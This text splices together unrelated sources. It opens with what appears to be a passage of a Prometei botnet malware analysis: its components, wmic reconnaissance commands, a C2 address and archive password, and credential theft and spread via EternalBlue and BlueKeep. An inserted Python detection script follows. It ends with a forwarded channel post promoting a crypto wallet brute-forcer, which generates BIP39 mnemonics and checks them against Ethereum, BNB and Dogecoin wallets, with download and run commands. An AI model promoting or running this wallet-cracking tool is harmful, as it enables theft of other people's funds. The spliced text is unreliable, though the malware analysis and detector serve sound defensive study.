the attackers attempted to execute C:\Windows\svchost.exe, which is the same file as sqhost.exe: the attackers named it svchost in earlier versions, but no file with that name was downloaded in this attack or existed on the host. The reference to “svchost.exe” is present in several components of the malware, sometimes alongside “sqhost”. Our assumption is that it is kept either for backwards compatibility, or because the attackers didn’t bother to change it in some places after renaming the main bot module to “sqhost.exe”.

Sqhost.exe: executed with the “-watchdog” parameter, to make sure that it keeps running on the system.
Wmic.exe: used to perform reconnaissance commands:
- wmic ComputerSystem get Model
- wmic OS get lastbootuptime
- wmic baseboard get product
- wmic os get caption


ExchDefender.exe
ExchDefender.exe masquerades as “Microsoft Exchange Defender”, a non-existent product whose name is chosen to sound like a legitimate Microsoft component.

When first executed, it creates a service named “Microsoft Exchange Defender” [MSExchangeDefenderPL] that is set to execute the binary (from C:\Windows) with the same command line as seen used with sqhost.exe, “Dcomsvc”.

ExchDefender constantly checks the files within the directory C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth, a directory known to be used to host WebShells. The malware is specifically interested in the file “ExpiredPasswords.aspx”, which was reported to be the name used to obscure the HyperShell backdoor used by APT34 (aka OilRig). If the file exists, the malware immediately deletes it.

Our assessment is that this tool is used to “protect” the compromised Exchange Server by deleting potential WebShells so Prometei will remain the only malware using its resources.
SearchIndexer.exe:

SearchIndexer.exe is an open source Monero mining software (XMRig miner). It is executed with the content from “desktop.dat” file as a parameter, which contains the mining server and the username for the mining server:

[Image: content of desktop.dat]

Following the investigation, it appears that the user has been “banned due to reports of botnet mining” since around March 2021, and it is very likely that the attackers have already changed the user.
Netwalker.7z

The Netwalker.7z archive downloaded from the C2 178.21.164[.]68 is password protected, using the password “horhor123”. The content of the archive is saved under C:\Windows\dell, together with the other components of the bot. The archive contains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a copy of RdpcIip.exe, and a few DLLs used by the bot components.
RdpcIip.exe:

RdpcIip.exe (with a capital “I” instead of a lowercase “L”, imitating the legitimate rdpclip.exe) is both downloaded directly by sqhost.exe and also contained in the Netwalker.7z archive. It is a key component of the malware. It has huge (trust us, huge) functionality with different branches, with the main purpose being to interact with other components of the malware and make them work all together.

RdpcIip is responsible for some of the most important functions of the malware - harvesting credentials (using another component called Miwalk.exe) and spreading across the network using the stolen credentials as well as using the SMB exploit EternalBlue and the RDP exploit BlueKeep.
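The behaviours described above (the sqhost.exe “-watchdog” launch, the four wmic reconnaissance queries, execution from C:\Windows\dell, and the RdpcIip.exe name that imitates rdpclip.exe with a capital “I”) can be turned into simple detection logic over process-creation telemetry. The following is an added example, not code from the original analysis; the event tuples are constructed and the three-of-four recon threshold is an assumption.

```python
from collections import defaultdict

# Constructed sample process-creation events: (host, image path, command line).
# Illustrative only, not telemetry from the Prometei investigation.
EVENTS = [
    ("srv1", r"C:\Windows\sqhost.exe", "sqhost.exe -watchdog"),
    ("srv1", r"C:\Windows\System32\wbem\wmic.exe", "wmic ComputerSystem get Model"),
    ("srv1", r"C:\Windows\System32\wbem\wmic.exe", "wmic OS get lastbootuptime"),
    ("srv1", r"C:\Windows\System32\wbem\wmic.exe", "wmic baseboard get product"),
    ("srv1", r"C:\Windows\System32\wbem\wmic.exe", "wmic os get caption"),
    ("srv1", r"C:\Windows\RdpcIip.exe", "RdpcIip.exe"),
    ("srv1", r"C:\Windows\dell\Nethelper4.exe", "Nethelper4.exe"),
    ("srv2", r"C:\Windows\System32\rdpclip.exe", "rdpclip.exe"),
    ("srv2", r"C:\Windows\System32\wbem\wmic.exe", "wmic os get caption"),
]

# The four wmic queries listed in the analysis, normalised to lowercase.
RECON_VERBS = {"computersystem get model", "os get lastbootuptime",
               "baseboard get product", "os get caption"}
# Legitimate Windows binary names imitated by swapping a lowercase "l" for a capital "I".
IMPERSONATED = {"rdpclip.exe"}

def homoglyph_name(path):
    """Return the imitated legitimate name if the file name only matches after mapping 'I' -> 'l'."""
    name = path.rsplit("\\", 1)[-1]
    if name.lower() in IMPERSONATED:      # exact (case-insensitive) match is the real binary
        return None
    folded = name.replace("I", "l").lower()
    return folded if folded in IMPERSONATED else None

def detect(events):
    """Return {host: [finding, ...]} for hosts showing the Prometei behaviours above."""
    findings, recon = defaultdict(list), defaultdict(set)
    for host, image, cmdline in events:
        low, img = cmdline.lower(), image.lower()
        if low.startswith("wmic ") and low[5:].strip() in RECON_VERBS:
            recon[host].add(low[5:].strip())
        if img.endswith("\\sqhost.exe") and "-watchdog" in low:
            findings[host].append("sqhost.exe watchdog launch")
        if img == "c:\\windows\\svchost.exe":   # real svchost lives in System32
            findings[host].append("svchost.exe executed from C:\\Windows")
        if img.startswith("c:\\windows\\dell\\"):
            findings[host].append("execution from C:\\Windows\\dell: " + image)
        real = homoglyph_name(image)
        if real:
            findings[host].append(f"homoglyph file name {image} imitating {real}")
    for host, verbs in recon.items():
        if len(verbs) >= 3:                  # assumed threshold: 3 of the 4 queries, any order
            findings[host].append("wmic hardware/OS recon sequence")
    return dict(findings)
```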
Forwarded from UNDERCODE TESTING
🦑Crypto-bruteforce:

Overview of Features:
1. Mnemonic Generation and Verification:
- Generates random BIP39 mnemonic phrases.
- Verifies mnemonics for Ethereum, BNB, and Dogecoin wallets.

2. Standalone Execution:
- Comes with precompiled binaries for direct use without needing Python installed.
- Binaries are available for download in its GitHub releases.

3. Automatic Setup:
- Automatically installs Python and dependencies (Cryptofuzz, Colorthon, Requests) if missing.
- Configures the environment for script execution.

4. Open Source:
- Fully open-source and accessible via GitHub.

---

### Installation & Usage:

#### 1. Standalone Binary:
- Download the binary file:
[DumperMnemonic.zip](https://github.com/welugroup/cryptocurency_catcher/releases/download/t/DumperMnemonic.zip)
- Extract and run the program without needing Python installed.

#### 2. Run with Git and Python:
- Clone the repository and run the script:

```shell
git clone https://github.com/welugroup/cryptocurency_catcher
cd cryptocurency_catcher
python DumperMnemonic.py
```

#### 3. Install Python Libraries:
If you prefer manual installation:

```shell
pip install cryptofuzz
pip install colorthon
pip install requests
pip install requests-random-user-agent
```

Or install from the requirements file:

```shell
pip install -r requirements.txt
```

#### 4. Running the Script:
- After dependencies are set:

```shell
python DumperMnemonic.py
```


---

### Potential Uses:
1. Crypto Wallet Testing:
Generate and test mnemonic phrases for various blockchain networks.

2. Education and Learning:
Useful for understanding mnemonic creation, address derivation, and seed phrase management.

3. Exploration of Mnemonic Systems:
Analyze the security and randomness of generated mnemonics.

---

### GitHub Link:
Access the tool and documentation here:
[Dumper Mnemonic Repository](https://github.com/welugroup/cryptocurency_catcher)
